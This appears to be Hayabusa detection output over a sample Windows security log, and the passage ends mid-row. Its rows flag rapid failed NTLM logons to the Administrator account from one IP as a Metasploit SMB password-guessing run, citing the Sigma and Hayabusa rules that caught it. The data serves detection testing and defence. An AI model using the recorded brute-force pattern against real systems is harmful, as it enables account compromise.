Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 